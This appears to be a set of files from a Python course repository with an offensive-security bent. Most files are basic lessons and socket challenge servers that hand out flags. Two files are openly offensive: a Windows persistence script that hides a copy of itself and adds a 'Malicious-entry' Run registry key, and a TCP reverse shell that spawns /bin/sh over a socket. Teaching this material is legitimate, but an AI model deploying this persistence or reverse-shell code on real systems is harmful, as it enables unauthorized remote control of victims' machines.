list3 = [1, 2, 3, 4, 5]
print(list3)
list4 = ['One', 'Two', 'Three', 'Four', 'Five']
print(list4)
list5 = ['One', 2, 'Three', 4, 'Five']
print(list5)
string = 'Pythonic Way of Life!'
list_from_string = list(string)
print(list_from_string)
if list1:
print('Not Empty')
else:
print('Is empty')
print(f'Size of "list5": {len(list5)}')
list5.append(5)
list5.append('Six')
print(f'"list5" : {list5}')
list5.extend(list4)
print(f'"list5" : {list5}')
element = list5.pop()
print(f'"element" : {element}')
print(f'"list5" : {list5}')
list5.clear()
print(f'"list5" : {list5}')
# List comprehensions
aux_list = []
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
aux_list.append(x + 5)
print(f'"For" : {aux_list}')
print(f'List comprehensions: {[x + 5 for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]]}')
print(f'Using range(): {[x + 5 for x in range(11)]}')
aux_list_2 = []
for x in range(11):
aux_list_2.append(x + 5) |
dggsoares/Simple_Python_Exercises | python_201/01 - knockd_client.py | <filename>python_201/01 - knockd_client.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
host = '192.168.246.128'
ports = [
{'number': 4433, 'protocol': 'tcp'},
{'number': 8800, 'protocol': 'tcp'},
{'number': 1234, 'protocol': 'udp'},
{'number': 3088, 'protocol': 'tcp'},
]
challenge_port = 6667
for port in ports:
if port['protocol'] == 'udp':
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.sendto('something'.encode(), (host, port['number']))
else:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setblocking(False)
s.connect_ex((host, port['number']))
s.close()
print(f'Port {challenge_port} OPEN!')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, challenge_port))
print(s.recv(3072).decode())
# Close port
ports = [7000, 8000, 9000]
for port in ports:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setblocking(False)
s.connect_ex((host, port))
s.close()
print(f'Port {challenge_port} CLOSED!') |
dggsoares/Simple_Python_Exercises | python_101/08 - while_statement.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('While 1')
count = 0
while True:
count += 1
print(f'Count: {count}')
if count == 10:
break
print('\nWhile 2')
count = 0
while count < 10:
count += 1
print(f'Count: {count}')
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_14_client.py | <filename>exercises_answer/ex_14_client.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import base64
HOST = 'py.insidertips.xyz'
PORT = 30001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
# Banner
print(s.recv(2048).decode())
# Response
message = 'Hello World!'.encode()
s.send(message)
print(f'Message sent: {message}\n')
# Receive response
data = s.recv(1024).decode()
print(data) |
dggsoares/Simple_Python_Exercises | python_201/09 - persistence.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import shutil
import ctypes
import winreg
FILENAME = __file__
path = os.getcwd() + '\\'
userprofile = os.getenv('userprofile')
destination = userprofile + '\\Documents\\' + FILENAME
print('[+] System recon')
print(f'\t[|] Working directory: {path}')
print(f'\t[|] User profile: {userprofile}')
print(f'\t[|] Destination: {destination}')
if os.path.exists(destination):
print('\n[X] System already touched, nothing to do...')
exit()
else:
print(f'[+] Persisting file: {FILENAME}')
shutil.copyfile(path + FILENAME, destination)
print('\t[+] File copy complete')
ctypes.windll.kernel32.SetFileAttributesW(destination, 0x02)
print('\t[+] File hiding complete')
with winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Run",
0,
winreg.KEY_ALL_ACCESS
) as key:
winreg.SetValueEx(
key,
'Malicious-entry',
0,
winreg.REG_SZ, destination
)
print('\t[+] Register udpate..')
|
dggsoares/Simple_Python_Exercises | python_201/03 - simple_http_server.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from http.server import HTTPServer, BaseHTTPRequestHandler
class MyHTTPServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
message = "Hello world from My HTTP Server!"
self.wfile.write(message.encode())
server_adress = ('', 32001)
httpd = HTTPServer(server_adress, MyHTTPServer)
print('Running server...')
httpd.serve_forever()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_22.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from http.server import HTTPServer, BaseHTTPRequestHandler
import base64
def xor(message, key):
return "".join([chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(message, key)])
class MyHTTPServer(BaseHTTPRequestHandler):
def do_GET(self):
message = "The Python Offensive Class"
key = 'PythonOffensive201#@113445'
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
encrypted_message = xor(message, key)
encoded_message = base64.b64encode(encrypted_message.encode())
self.wfile.write(encoded_message)
server_adress = ('', 3321)
httpd = HTTPServer(server_adress, MyHTTPServer)
print('Running server...')
httpd.serve_forever()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_11.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ipwhois import IPWhois
import json
import pickle
# Ex 1.1
# Read a file called 'exercise11.txt' with IPs, create a list of targets using the data structures Lists
# and Dictionaries and print them.
from pprint import pprint
targets = []
with open('exercise11.txt', 'r') as file:
for ip in file:
aux = {'ip': ip.replace('\n', '')}
targets.append(aux)
# pprint(targets)
# Ex 1.2
# Using the Whois library see information for each target present in the list created in the previous exercise
# and update the information for each IP in the list.
for index, target in enumerate(targets):
# Whois Lookup
print(f'{index} : {target["ip"]}')
lookup = IPWhois(target['ip']).lookup_whois()
cidrs = [cidr for line in lookup['nets'] for cidr in line['cidr'].replace(' ', '').split(',')]
description = [line['description'].replace('\n', '') for line in lookup['nets'] if line['description'] is not None]
address = [line['address'].replace('\n', '') for line in lookup['nets'] if line['address'] is not None]
emails = [email for line in lookup['nets'] if line['emails'] if not None for email in line['emails']]
# Information retrivied
target['cidrs'] = cidrs
target['descriptions'] = description
target['address'] = address
target['emails'] = emails
# Update the target list
targets[index] = target
# Ex 1.3
# Write in file called 'exercise13.txt' the lists of targets used in the previous exercise.
with open('execises13.txt', 'w') as file_output:
for target in targets:
file_output.write(str(target))
file_output.write('\n')
with open('execises13_json.txt', 'w') as file_output_json:
file_output_json.write(json.dumps(targets))
with open('execises13_pickle.txt', 'wb') as file_output_pickle:
file_output_pickle.write(pickle.dumps(targets))
# Reading targets list from file
with open('execises13.txt', 'r') as file_input:
print('\n----- STANDARD LOADS -----')
# for line in file_input:
# targets.append(dict(line))
with open('execises13_json.txt', 'r') as file_input_json:
targets = json.loads(file_input_json.read())
print('\n----- JSON LOADS -----')
pprint(targets)
print('\n----- HOST INFORMATION -----')
print(f'IP: {targets[3]["ip"]}')
print(f'Descriptions: {targets[3]["descriptions"]}')
print(f'CIDRs: {targets[3]["cidrs"]}')
print(f'Adress: {targets[3]["address"]}')
print('---------------------------')
with open('execises13_pickle.txt', 'rb') as file_input_pickle:
targets = pickle.loads(file_input_pickle.read())
print('\n----- PICKLE LOADS -----')
pprint(targets)
|
dggsoares/Simple_Python_Exercises | python_101/13 - oop_python.py | <filename>python_101/13 - oop_python.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Robot:
def __init__(self, name, color):
self.name = name
self.color = color
def talk(self):
print(f"Hi Human! I'm {self.name} robot, have {self.color} color and type '{self.__class__.__name__}'")
def walk(self):
print(f'WALKING -> {self.name}')
def stop(self):
print(f'STOPPING -> {self.name}')
class IndustrialRobot(Robot):
def __init__(self, name, color, tool):
self.tool = tool
Robot.__init__(self, name, color)
# Override method
def talk(self):
print(
f"Hi Human! I'm {self.name} robot, have {self.color} color, type '{self.__class__.__name__}' and {self.tool} tool!")
class AIRobot(Robot):
def __init__(self, name, color, brain):
self.brain = brain
Robot.__init__(self, name, color)
# New method
def eliminate_humans(self):
print('Yeah! Just kill everyone!')
def main():
print('[+] Using Robot base class [+]')
# Creating instances
robot_1 = Robot('George', 'red')
robot_2 = Robot('Bob', 'blue')
# Using methods
robot_1.walk()
robot_1.talk()
robot_2.walk()
robot_2.talk()
robot_2.stop()
robot_1.stop()
# Accessing attributes
print(robot_1.name)
print(robot_2.name)
print('\n[+] Using derived IndustrialRobot and AIRobot class [+]')
# Creating instances
industrial_robot = IndustrialRobot('Xpto', 'green', 'hammer')
ai_robot = AIRobot('T1000', 'red', 'Neural circuit')
# Using methods
industrial_robot.walk()
industrial_robot.talk()
ai_robot.talk()
ai_robot.walk()
ai_robot.stop()
industrial_robot.stop()
if __name__ == "__main__":
main()
|
dggsoares/Simple_Python_Exercises | exercises/exercises.py | import socketserver
import threading
import random
import base64
import logging
import coloredlogs
import sys
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
logger=logger,
fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
datefmt='%d-%m-%y %H:%M:%S',
stream=sys.stdout
)
ZEN_OF_PYTHON = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
'Flat is better than nested.',
'Sparse is better than dense.',
'Readability counts.',
"Special cases aren't special enough to break the rules.",
'Although practicality beats purity.',
'Errors should never pass silently.',
'Unless explicitly silenced.',
'In the face of ambiguity, refuse the temptation to guess.',
'There should be one-- and preferably only one --obvious way to do it.',
"Although that way may not be obvious at first unless you're Dutch.",
'Now is better than never.',
'Although never is often better than *right* now.',
"If the implementation is hard to explain, it's a bad idea.",
'If the implementation is easy to explain, it may be a good idea.',
"Namespaces are one honking great idea -- let's do more of those!"
]
class Exercise(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
return
class Ex14(Exercise):
def __init__(self, request, client_address, server):
self.name = 'Ex14'
self.description = 'Echo Server with Sockets'
self.welcome = '''\
uuuuuuu
uu$$$$$$$$$$$uu
uu$$$$$$$$$$$$$$$$$uu
u$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$" "$$$" "$$$$$$u
"$$$$" u$u $$$$"
$$$u u$u u$$$
$$$u u$$$u u$$$
"$$$$uu$$$ $$$uu$$$$"
"$$$$$$$" "$$$$$$$"
u$$$$$$$u$$$$$$$u
u$"$"$"$"$"$"$u
uuu $$u$ $ $ $ $u$$ uuu
u$$$$ $$$$$u$u$u$$$ u$$$$
$$$$$uu "$$$$$$$$$" uu$$$$$$
u$$$$$$$$$$$uu """"" uuuu$$$$$$$$$$
$$$$"""$$$$$$$$$$uuu uu$$$$$$$$$"""$$$"
""" ""$$$$$$$$$$$uu ""$"""
uuuu ""$$$$$$$$$$uuu
u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
$$$$$$$$$$"""" ""$$$$$$$$$$$"
"$$$$$" ""$$$$""
$$$" $$$$"
Enjoy Offensive Python!!!
EXERCISE 1.4 - Echo Server With Sockets
'''.encode()
self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
self.correct = '''\
+---------------------------------------------+
| CORRECT MESSAGE! :) |
+---------------------------------------------+
| The Flag is: PYTHON{P1th0nH3llOFromS0CK3T$} |
+---------------------------------------------+
'''.encode()
self.answer = 'Hello Word!'
Exercise.__init__(self, request, client_address, server)
def handle(self):
# Client logging
cur_thread = threading.currentThread().getName()
client_ip, client_port = self.client_address
logger.info(
f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
f'{self.server.server_address[1]}')
self.request.send(self.welcome) # Welcome message
data = self.request.recv(2048).decode() # Client response
if data == self.answer:
self.request.send(self.correct)
logger.info(f'{self.name} | {client_ip}:{client_port}, CORRECT!')
else:
self.request.send(self.wrong)
logger.info(f'{self.name} | {client_ip}:{client_port}, WRONG "{data}"')
return
class Ex15(Exercise):
def __init__(self, request, client_address, server):
self.name = 'Ex15'
self.description = 'Base64 Decode?'
self.welcome = '''
---_ ......._-_--.
(|\ / / /| \\
/ / .' -=-' `.
/ / .' )
_/ / .' _.) /
/ o o _.-' / .'
\ _.-' / .'*|
\______.-'// .'.' \*|
\| \ | // .'.' _ |*|
` \|// .'.'_ _ _|*|
. .// .'.' | _ _ \*|
\`-|\_/ / \ _ _ \*
`/'\__/ \ _ _ \*
/^| \ _ _ \*
' ` \ _ _\_
EXERCISE 1.5 - Base64 Decode?
'''.encode()
self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
self.correct = '''\
+-------------------------------------------------+
| CORRECT MESSAGE! :) |
+-------------------------------------------------+
| The Flag is: PYTHON{P1th0nGr@tzf0rB@se64dec0d3} |
+-------------------------------------------------+
'''.encode()
self.answer = ''
Exercise.__init__(self, request, client_address, server)
def handle(self):
# Client logging
cur_thread = threading.currentThread().getName()
client_ip, client_port = self.client_address
logger.info(
f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
f'{self.server.server_address[1]}')
self.request.send(self.welcome)
self.request.send(self.create_prhase()) # Phrase challenge
data = self.request.recv(1024).decode() # Client response
if data == self.answer:
self.request.send(self.correct)
logger.info(f'{self.name} | {client_ip}:{client_port}, CORRECT!')
else:
self.request.send(self.wrong)
logger.info(f'{self.name} | {client_ip}:{client_port}, WRONG "{data}"')
return
def create_prhase(self):
phrase = random.choice(ZEN_OF_PYTHON)
self.answer = phrase[:10]
return base64.b64encode(phrase.encode())
class Ex16(Exercise):
def __init__(self, request, client_address, server):
self.name = 'Ex16'
self.description = 'Math!'
self.welcome = '''\
_____
.'/L|__`.
/ =[_]O|` \\
|"+_____":|
__:='|____`-:__
||[] ||====| []||
||[] | |=| | []||
|:||_|=|U| |_||:|
|:|||]_=_ =[_||:|
| |||] [_][]C|| |
| ||-'"""""`-|| |
/|\\_\_|_|_/_//|\\
|___| /|\ |___|
`---' |___| `---'
`---'
EXERCISE 1.6 - Math Using Sockets!
operators = ['+', '-', '*', '/']
'''.encode()
self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
self.correct = '''\
+----------------------------------------------+
| CORRECT MESSAGE! :) |
+----------------------------------------------+
| The Flag is: PYTHON{P1th0nDoM@thwithS0ck3t$} |
+----------------------------------------------+
'''.encode()
self.answer = ''
Exercise.__init__(self, request, client_address, server)
def handle(self):
# Client logging
cur_thread = threading.currentThread().getName()
client_ip, client_port = self.client_address
logger.info(
f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
f'{self.server.server_address[1]}')
self.request.send(self.welcome) # Welcome message
self.request.send(self.create_challenge()) # First Challenge
first_response = self.request.recv(1024).decode() # Client response
if first_response == self.answer:
logger.info(f'{self.name} | {client_ip}:{client_port}, step 1 CORRECT!')
self.request.send(self.create_challenge()) # Second challenge
second_response = self.request.recv(1024).decode() # Client response
if second_response == self.answer:
logger.info(f'{self.name} | {client_ip}:{client_port}, step 2 CORRECT!')
self.request.send(self.create_challenge()) # Three challenge
third_response = self.request.recv(1024).decode() # Client response
if third_response == self.answer:
logger.info(f'{self.name} | {client_ip}:{client_port}, step 3 CORRECT!')
self.request.send(self.correct) # Correct answer for challenge
else:
self.request.send(self.wrong)
return
def create_challenge(self):
operators = ['+', '-', '*', '/']
a = random.randint(1, 1000)
b = random.randint(1, 1000)
operator = random.choice(operators)
self.answer = str(eval(f'{a}{operator}{b}'))
expression = f'{a}&{b}&{operator}'
return expression.encode()
class SocketSample(Exercise):
def __init__(self, request, client_address, server):
self.name = 'SocketSample'
self.description = 'Just a socket samples!'
self.welcome = random.choice(ZEN_OF_PYTHON).encode()
Exercise.__init__(self, request, client_address, server)
def handle(self):
# Client logging
cur_thread = threading.currentThread().getName()
client_ip, client_port = self.client_address
logger.info(
f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
f'{self.server.server_address[1]}')
self.request.send(self.welcome) # Just send welcome message
return |
dggsoares/Simple_Python_Exercises | exercises_answer/ex_15_client.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import base64
HOST = 'py.insidertips.xyz'
PORT = 30030
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
# Banner
print(s.recv(1024).decode())
# Encoded data
encoded_data = s.recv(1024)
print(f'[+] Encoded data : {encoded_data}')
# Decoded data
decode_data = base64.b64decode(encoded_data)
print(f'[+] Decoded data : {decode_data}')
# Send first 10 characters from decoded data
slice_decoded_data = decode_data[:10]
s.send(slice_decoded_data)
print(f'[+] Slice decoded data : {slice_decoded_data}\n')
# Receive response
data = s.recv(1024).decode()
print(data) |
dggsoares/Simple_Python_Exercises | python_101/12.3 - sockets_star_wars.py | <filename>python_101/12.3 - sockets_star_wars.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
HOST = 'towel.blinkenlights.nl'
PORT = 23
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
while True:
print(s.recv(1024).decode(), end='')
|
dggsoares/Simple_Python_Exercises | python_201/11 - simple_tcp_reverse_shell.py | <filename>python_201/11 - simple_tcp_reverse_shell.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import subprocess
import os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 5689))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(['/bin/sh', '-i'])
|
dggsoares/Simple_Python_Exercises | python_101/09 - functions.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def do_print(string):
print(string)
print(f'Function do_print(string):')
do_print(f'Testing functions on Python')
do_print(f'5 + 6 = {5 + 6}')
def add_numbers(x, y):
result = x + y
return result
print('\nFunction add_numbers(x, y):')
print(f'2 + 4 = {add_numbers(2, 4)}')
print(f'3 + 4 = {add_numbers(7, 8)}')
def do_math(a, b, operator):
if operator == '+':
return a + b
elif operator == '-':
return a - b
elif operator == '*':
return a * b
elif operator == '/':
return a / b
print('\nFunction do_math(a, b, operator):')
a = 34
b = 21
print(f'[+] Addition: {a} + {b} = {do_math(a, b, "+")}')
print(f'[+] Division: {a} / {b} = {do_math(a, b, "/")}')
print(f'[+] Subtraction: {a} - {b} = {do_math(a, b, "-")}')
print(f'[+] Multiplication: {a} * {b} = {do_math(a, b, "*")}')
def main():
print('Main Method!')
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_101/02.1 - strings.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Strings
print('------------ Building Strings ------------')
string1 = 'This is a string. We built in single quotes'
string2 = "This is also a string. We built in double quotes"
string3 = '''
This is built using triple quotes,
so it can span
multiple lines
'''
string4 = """
This is built using triple double-quotes,
so it can span
multiple lines too.
"""
print(string1)
print(string2)
print(string3)
print(string4)
print('--------------------------------------------')
print()
# Formatting Strings
print('------------ Formatting strings ------------')
name = 'John'
last_name = 'Williams'
print('Hi, %s!' % name)
print('Hi {} {}!'.format(name, last_name))
print('Hi {1} {0}!'.format(last_name, name))
print('Hi {1} {0}!'.format(name, last_name))
print('Hi {name} {last_name}!'.format(name=name, last_name=last_name))
print(f'Hi {name} {last_name}!!')
print('--------------------------------------------')
print()
# String slicing
# str[start:end]
print('-------------- String slicing --------------')
str1 = 'String slicing'
str2 = "Special cases aren't special enough to break the rules."
print(f'List from str1: {list(str1)}')
print(f'Character in "str2" at position 0: {str2[0]}')
print(f'Character at "str2" position 0: {str2[3]}')
print(f'str2[:10]: {str2[:10]}')
print(f'str2[8:]: {str2[8:]}')
print(f'Extract "cases" word (positive index): {str2[8:13]}')
print(f'Extract "break" word (negative index): {str2[-16:-11]}')
for index, character in enumerate(str2):
print(f'{index} : {character}')
print(list(enumerate(str1))) |
dggsoares/Simple_Python_Exercises | python_101/06 - if_statements.py | <filename>python_101/06 - if_statements.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
run = True
if run:
print("I'm running!")
sleep = False
if sleep:
print("I'm sleeping!")
else:
print("I'm not sleeping!")
aux = 9
if aux == 15:
print('"Aux" equals 15')
elif aux == 14:
print('"Aux" equals 14')
elif aux <= 12 and aux >= 10:
print('"Aux" is between 10 and 12')
else:
print('"Aux" is under 10') |
dggsoares/Simple_Python_Exercises | knockd/knockd_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
import logging
import coloredlogs
import sys
import socketserver
import threading
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
logger=logger,
fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
datefmt='%d-%m-%y %H:%M:%S',
stream=sys.stdout
)
class KnockdServer(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.name = 'Knockd Challenge'
self.welcome = '''
u
. x!X
."X M~~>
d~~XX~~~k .u.xZ `\ \ "%
d~~~M!~~~?..+"~~~~~?: " h
'~~~~~~~~~~~~~~~~~~~~~? `
4~~~~~~~~~~~~~~~~~~~~~~> '
':~~~~~~~~~~(X+"" X~~~~> xHL
%~~~~~(X=" 'X"!~~% :RMMMRMRs
^"*f` ' (~~~~~MMMMMMMMMMMx
f /` % !~~~~~MMMMMMMMMMMMMc
F ? ' !~~~~~!MMMMMMMMMMMMMM.
' . :": " : !X""(~~?MMMMMMMMMMMMMMh
'x .~ ^-+=" ? "f4!* #MMMMMMMMMMMMMM.
/" .." `MMMMMMMMMMMMMM
h .. ' #MMMMMMMMMMMM
f ' @MMMMMMMMMMM
: .:="" > dMMMMMMMMMMMMM
"+mm+=~(" RR @MMMMMMMMMMMMM"
% (MMNmHHMMMMMMMMMMMMMMF
uR5 @MMMMMMMMMMMMMMMMMMMF
dMRMM> dMMMMMMMMMMMMMMMMMMMF
RM$MMMF=x..=" RMRM$MMMMMMMMMMMMMMF
MMMMMMM 'MMMMMMMMMMMMMMMMMMF
dMMRMMMK 'MMMMMMMMMMMMMMMMM"
RMMRMMME 3MMMMMMMMMMMMMMMM
@MMMMMMM> 9MMMMMMMMMMMMMMM~
'MMMMMMMM> 9MMMMMMMMMMMMMMF
tMMMMMMMM 9MMMMMMMMMMMMMM
MMMM$MMMM 9MMMMMMMMMMMMMM
'MMMMRMMMM 9MMMMMMMMMMMMM9
MMMMMMMMMM 9MMMMMMMMMMMMMM
RMMM$MMMMM 9MMMMMMMMMMMMMM
tMMMMMMMMMM 9MMMMMMMMMMMMMX
RMMMMMMMMMM 9MMMMMMMMMMMMME
JMMMMMMMMMMM MMMMMMMMMMMMMME
9MMMM$MMMMMM RMMMMMMMMMMMMME
MMMMMRMMMMMX RMMMMMMMMMMMMMR
RMMMMRMMMMME EMMMMMMMMMMMMM!
9MMMMMMMMMME MMMMMMMMMMMMMM>
[+] KNOCKD CHALLENGE [+] {
YOU DID IT!
CONGRATULATIONS!
}
'''.encode()
socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
return
def handle(self):
# Client logging
cur_thread = threading.currentThread().getName()
client_ip, client_port = self.client_address
logger.info(
f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
f'{self.server.server_address[1]}')
self.request.send(self.welcome) # Just send welcome message
return
class CustomTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
socketserver.TCPServer.allow_reuse_address = True
socketserver.ThreadingMixIn.daemon_threads = True
return
def create_server_exercise(port, exercise):
custom_tcp_servers = []
custom_tcp_servers_threads = []
server = CustomTCPServer(('', port), exercise)
custom_tcp_servers.append(server)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
custom_tcp_servers_threads.append(thread)
logger.debug(f'{len(custom_tcp_servers_threads)} threads is running on port: {port}')
if __name__ == '__main__':
create_server_exercise(6667, KnockdServer)
while True:
try:
time.sleep(1)
except KeyboardInterrupt as e:
logger.info('Shutting down servers...')
sys.exit(0)
|
dggsoares/Simple_Python_Exercises | python_201/02 - requests_library.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
URL = "https://www.us-cert.gov/ncas/alerts/2014"
r = requests.get(url=URL)
soup = BeautifulSoup(r.text, 'html.parser')
alerts = soup.select('.item-list ul li')
for alert in alerts:
id = alert.find('span', {'class': 'document_id'}).string
title = alert.find('span', {'class': 'document_title'}).string
print(id + title)
print(f'Total Alerts: {len(alerts)}') |
dggsoares/Simple_Python_Exercises | exercises/ex1_server.py | import time
from exercises import *
import logging
import coloredlogs
import sys
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
logger=logger,
fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
datefmt='%d-%m-%y %H:%M:%S',
stream=sys.stdout
)
class CustomTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
socketserver.TCPServer.allow_reuse_address = True
socketserver.ThreadingMixIn.daemon_threads = True
return
def create_server_exercise(start, end, exercise):
custom_tcp_servers = []
custom_tcp_servers_threads = []
for port in range(start, end + 1):
server = CustomTCPServer(('', port), exercise)
custom_tcp_servers.append(server)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
custom_tcp_servers_threads.append(thread)
logger.debug(f'{len(custom_tcp_servers_threads)} threads is running on ports: {start}-{end}')
if __name__ == '__main__':
create_server_exercise(30000, 30010, Ex14)
create_server_exercise(30020, 30030, Ex15)
create_server_exercise(30040, 30050, Ex16)
create_server_exercise(45000, 45010, SocketSample)
while True:
try:
time.sleep(1)
except KeyboardInterrupt as e:
logger.info('Shutting down servers...')
sys.exit(0)
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_21.py | <filename>exercises_answer/ex_21.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
from pprint import pprint
with open('exercise21.txt', 'r') as file:
for ip in file:
ip = ip.replace('\n', '')
url = f'http://{ip}/robots.txt'
print(f'\n[+] ---- {ip} robots.txt content ---- [+]')
try:
r = requests.get(url, timeout=1)
pprint(r.text)
except requests.Timeout as e:
print(f'\t[ERROR] {ip} TIMEOUT ERROR [ERROR]')
print(f'[+] --------------------------------- [+]')
|
dggsoares/Simple_Python_Exercises | python_101/05 - list_plus_dictionaries.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
targets = [
{'ip': "192.168.3.11", 'real_location': 'Virginia', 'keyfile': 'key_USA.pem', 'services': ['HTTP', 'SQL Server']},
{'ip': "172.16.58.3", 'real_location': 'Ohio', 'keyfile': 'key_USA_OHIO.pem', 'services': ['DHCP', 'GIT']},
{'ip': "172.16.58.3", 'real_location': 'Virginia', 'keyfile': 'key_USA.pem', 'services': ['RPC', 'NTP']},
{'ip': "192.168.3.11", 'real_location': 'London', 'keyfile': 'key_LONDON.pem', 'services': ['SMTP', 'DNS']},
{'ip': "172.16.31.10", 'real_location': 'São Paulo', 'keyfile': 'key_BR.pem', 'services': ['HTTP', 'Netbios']},
{'ip': "192.168.127.12", 'real_location': 'Seoul', 'keyfile': 'key_SEOUL.pem', 'services': ['SSH', 'SCP']},
{'ip': "192.168.3.11", 'real_location': 'Syndey', 'keyfile': 'key_AUS.pem', 'services': ['FTP', 'HTTPS']}
]
for target in targets:
print(f'''
[+] IP: {target["ip"]}
(-) Location: {target["real_location"]}
(-) Pub Key File: {target["keyfile"]}
(-) Services: {target["services"]}
'''
) |
dggsoares/Simple_Python_Exercises | samples/socketserver_echo_thread.py | # https://pymotw.com/3/socketserver/
import logging
import socketserver
import threading
logging.basicConfig(level=logging.DEBUG, format='%(name)s: %(message)s', )
class EchoRequestHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('EchoRequestHandler')
self.logger.debug('__init__')
socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
return
def setup(self):
self.logger.debug('setup')
return socketserver.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
data = self.request.recv(2048).decode()
cur_thread = threading.currentThread()
response = f'\n\tThread: {cur_thread.getName()} {data}'.encode()
self.logger.debug(f'recv()->"{data}"')
self.logger.debug(f'answer: "{response}"')
self.request.send(response)
return
def finish(self):
self.logger.debug('finish')
return socketserver.BaseRequestHandler.finish(self)
class EchoServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address,
handler_class=EchoRequestHandler,
):
self.logger = logging.getLogger('EchoServer')
self.logger.debug('__init__')
socketserver.TCPServer.__init__(self, server_address, handler_class)
return
def server_activate(self):
self.logger.debug('server_activate')
socketserver.TCPServer.server_activate(self)
return
def serve_forever(self, poll_interval=0.5):
self.logger.debug('waiting for request')
self.logger.info('Handling requests, press <Ctrl-C> to quit')
socketserver.TCPServer.serve_forever(self, poll_interval)
return
def handle_request(self):
self.logger.debug('handle_request')
return socketserver.TCPServer.handle_request(self)
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)', request, client_address)
return socketserver.TCPServer.verify_request(self, request, client_address, )
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)', request, client_address)
return socketserver.TCPServer.process_request(self, request, client_address, )
def server_close(self):
self.logger.debug('server_close')
